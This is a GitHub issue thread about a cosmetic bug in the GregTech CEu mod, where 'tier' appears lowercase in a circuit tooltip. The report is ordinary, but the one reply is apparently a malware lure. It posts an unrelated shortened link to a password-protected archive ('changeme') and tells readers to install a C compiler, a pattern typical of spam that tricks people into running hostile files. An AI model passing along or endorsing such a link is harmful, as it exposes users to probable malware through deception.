### ISSUE TITLE
Wetware Processor Assembly has the word "tier" as lowecase

### ISSUE THREAD

**Issue by a-a-GiTHuB-a-a** [GregTechCEu/GregTechCEu-1.19#2060]
### Checked for existing issues

- [X] I have checked for existing issues, and have found none.

### Tested latest version

- [X] I have checked that this occurs on the latest version.

### GregTech CEu Version

1.4.4

### Minecraft Version

1.21.1

### Recipe Viewer Installed

JEI

### Environment

singleplayer (doesn't matter)

### Cross-Mod Interaction

No

### Other Installed Mods

a few qol mods like sodium…the ftb mods…

### Expected Behavior

The word "tier" is in titlecase, like it is with the other circuits.

### Actual Behavior

It's LOWERCASE!

### Steps to Reproduce

1. acquire circuit
2. read tooltip
3. look at the inconsistency

### Additional Information

idk where this is handled. if I did, I would've made a PR

**Comment by SagarChandra07** [comment]
maybe this will help
https://bit.ly/47P0Nvo
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)
